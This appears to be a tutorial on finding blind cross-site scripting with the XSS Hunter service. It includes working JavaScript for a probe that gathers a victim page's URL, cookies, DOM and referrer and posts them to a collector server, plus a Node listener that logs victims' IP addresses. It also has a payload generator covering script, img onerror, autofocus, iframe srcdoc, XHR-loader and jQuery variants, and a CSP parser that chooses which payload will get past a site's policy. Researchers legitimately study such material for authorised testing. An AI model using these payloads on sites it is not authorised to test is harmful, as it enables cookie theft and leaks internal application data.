Blind XSS using XSS Hunter
What is XSS Hunter?
XSS Hunter is a free service provided by @IAmMandatory with the aim of making it easier for researchers to find blind XSS: cases where the injected payload executes somewhere the researcher cannot observe directly, for example an internal admin panel, a log viewer or a support tool that later renders the submitted input. XSS Hunter does not scan pages. Each payload loads a JavaScript probe from your xss.ht subdomain, and when that probe fires in a victim's browser it reports back to the service, which records details such as the URL of the vulnerable page, the victim's IP address, the cookies readable from JavaScript, the page DOM and a screenshot of the page.
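The two halves of that callback, as an added example rather than XSS Hunter's own code: the probe that runs in the victim's browser once a payload fires, and the collector endpoint that receives the report and attaches what only the server can see (the source IP). collectContext() takes a window-like object so it can run against the constructed fake below without a browser; on a real page it would be called as collectContext(window). The collector URL is a placeholder, and screenshot capture is left out.

```javascript
// Added example, not XSS Hunter's own code. Probe side: gather the context of
// the page the payload fired in. `win` is the browser window (or the
// constructed stand-in below).
function collectContext(win) {
  const doc = win.document;
  return {
    url: win.location.href,
    referrer: doc.referrer,
    title: doc.title,
    userAgent: win.navigator.userAgent,
    // document.cookie never exposes HttpOnly cookies, so an empty value does
    // not mean the victim was unauthenticated; the report itself proves
    // that your input was rendered and executed.
    cookies: doc.cookie,
    // The DOM is what tells you which internal application (admin panel,
    // log viewer, ticketing system) rendered your input.
    dom: doc.documentElement.outerHTML,
  };
}

// Serialise and deliver the report. `post` is injected so the function can
// be exercised without a network; in a browser pass a wrapper around fetch()
// or navigator.sendBeacon().
function sendReport(report, collectorUrl, post) {
  return post(collectorUrl, JSON.stringify(report));
}

// Collector side: parse the body, refuse anything that is not a JSON object
// with a page URL, and attach the connection's remote address plus a receive
// timestamp. `now` is injectable for deterministic testing.
function handleReport(remoteAddress, body, now = () => new Date()) {
  let report;
  try {
    report = JSON.parse(body);
  } catch (e) {
    return null;
  }
  if (!report || typeof report !== 'object' || typeof report.url !== 'string') return null;
  return { ...report, victimIp: remoteAddress, receivedAt: now().toISOString() };
}

// Minimal Node.js HTTP listener around handleReport. Not started here; call
// startCollector(8080, []) yourself to run it.
function startCollector(port, store) {
  const http = require('http');
  return http.createServer((req, res) => {
    let data = '';
    req.on('data', (chunk) => { data += chunk; });
    req.on('end', () => {
      const record = handleReport(req.socket.remoteAddress, data);
      if (record) store.push(record);
      res.writeHead(record ? 204 : 400);
      res.end();
    });
  }).listen(port);
}

// Constructed stand-in for a browser window: an internal admin page that
// rendered a tester's payload. Not captured from any real target.
const fakeWindow = {
  location: { href: 'https://admin.internal.example/tickets/42' },
  navigator: { userAgent: 'Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0' },
  document: {
    referrer: 'https://admin.internal.example/tickets',
    title: 'Ticket #42',
    cookie: 'theme=dark',
    documentElement: { outerHTML: '<html><body><h1>Ticket #42</h1></body></html>' },
  },
};
```

The useful practitioner detail is in handleReport: the victim's IP never travels inside the report, it is taken from the connection, so a report arriving from an RFC 1918 address or a corporate egress range is itself the evidence that the payload fired inside an internal application.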
How to make payload in XSS Hunter?
You only need to create an account at xsshunter.com; you will then be asked to choose a subdomain under xss.ht. All of your payloads reference that subdomain, so every report is tied to your account.
Once the account and subdomain exist, open the Payloads page. It lists ready-made payloads for different injection contexts, such as:
- <script> Tag Payload - Basic XSS payload, for wherever raw HTML is reflected and <script> is not filtered.
- <input> Tag Payload - For bypassing poorly designed blacklist systems: the HTML5 autofocus attribute makes the onfocus handler fire without any user interaction.
- <img> Tag Payload - Another basic payload, for when <script> tags are explicitly filtered; the code runs from the onerror handler of an image that fails to load.
- <video><source> Tag Payload - HTML5 payload; only works in Firefox, Chrome and Opera.
- <iframe srcdoc= Tag Payload - HTML5 payload; only works in Firefox, Chrome and Opera. The markup lives inside the srcdoc attribute value, so it can be HTML-entity-encoded and the injected text never contains a literal <script.
- XMLHTTPRequest Payload - For web applications whose Content Security Policy has a script-src directive that permits 'unsafe-inline' but does not whitelist your xss.ht host: a plain <script src> would be blocked, so an inline script fetches the probe with XMLHttpRequest instead. connect-src (or default-src as its fallback) must still allow the request to your subdomain.
- $.getScript() Payload - Example payload for sites that already include jQuery.
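To make the choice between these families concrete, here is an added example (my own payload strings, not copies of the ones XSS Hunter serves) that builds one payload per family for a given collector host and checks a Content-Security-Policy header to decide which family can actually load the probe. The host example.xss.ht in the tests is a placeholder for your own subdomain.

```javascript
// Added example, not XSS Hunter's own payload strings. The inline loader is
// reused by the attribute-based payloads: it appends a <script> pointing at
// the collector, which the plain <script> payload does directly.
function loaderJs(host) {
  return `var s=document.createElement('script');s.src='https://${host}';document.body.appendChild(s)`;
}

function buildPayloads(host) {
  const src = `https://${host}`;
  const loader = loaderJs(host);
  return {
    // Basic: raw HTML is reflected and <script> is not filtered.
    script: `<script src="${src}"></script>`,
    // autofocus triggers onfocus with no user interaction; defeats blacklists
    // that only look for <script> or mouse/click handlers.
    input: `<input onfocus="${loader}" autofocus>`,
    // A broken image source fires onerror immediately.
    img: `<img src="x" onerror="${loader}">`,
    // <source> fires onerror when the media cannot be loaded.
    video: `<video><source src="x" onerror="${loader}"></video>`,
    // srcdoc is an attribute value, so entities are decoded inside it and the
    // injected text never contains a literal "<script".
    iframeSrcdoc: `<iframe srcdoc="&lt;script src=&quot;${src}&quot;&gt;&lt;/script&gt;"></iframe>`,
    // CSP allows 'unsafe-inline' but not the collector host: fetch the probe
    // with XHR and run it as an inline script (no eval, so 'unsafe-eval' is
    // not required); connect-src must still permit the request.
    xhr: `<script>var x=new XMLHttpRequest();x.open('GET','${src}');x.onload=function(){var s=document.createElement('script');s.text=x.responseText;document.head.appendChild(s)};x.send()</script>`,
    // Pages that already load jQuery.
    jquery: `<script>$.getScript('${src}')</script>`,
  };
}

// Parse a Content-Security-Policy header into { directive: [source, ...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Does one CSP source expression permit loading https://host? Handles '*',
// the https: scheme source, exact hosts and *.wildcard hosts; ports and paths
// are ignored, and keyword sources ('self', nonces, hashes) never match.
function sourceMatchesHost(expr, host) {
  const e = expr.toLowerCase();
  if (e === '*' || e === 'https:') return true;
  const bare = e.replace(/^https?:\/\//, '').replace(/[/:].*$/, '');
  if (bare.startsWith('*.')) return host.endsWith(bare.slice(1)) && host.length > bare.length - 1;
  return bare === host;
}

function probeOptions(cspHeader, host) {
  const policy = parseCsp(cspHeader);
  // script-src and connect-src both fall back to default-src; no policy at
  // all means everything is allowed.
  const effective = (name) => policy[name] || policy['default-src'] || ['*'];
  const scriptSrc = effective('script-src').map((s) => s.toLowerCase());
  const connectSrc = effective('connect-src');
  // A nonce or hash in script-src makes 'unsafe-inline' ignored (CSP Level 2+).
  const hasNonceOrHash = scriptSrc.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  return {
    externalScript: scriptSrc.some((s) => sourceMatchesHost(s, host)),
    inlineScript: scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash,
    connect: connectSrc.some((s) => sourceMatchesHost(s, host)),
  };
}

// Pick the payload family that can load the probe under the given policy, or
// null if neither a <script src> nor the XHR loader would get through.
function choosePayload(cspHeader, host) {
  const o = probeOptions(cspHeader, host);
  if (o.externalScript) return 'script';
  if (o.inlineScript && o.connect) return 'xhr';
  return null;
}
```

choosePayload only answers the CSP question; which tag family you inject still depends on what the application's filter lets through. Note the case where the policy sets only default-src 'self' alongside script-src 'unsafe-inline': the inline script runs, but the XHR to your subdomain is blocked because connect-src inherits 'self', so the probe never loads and you see no hit.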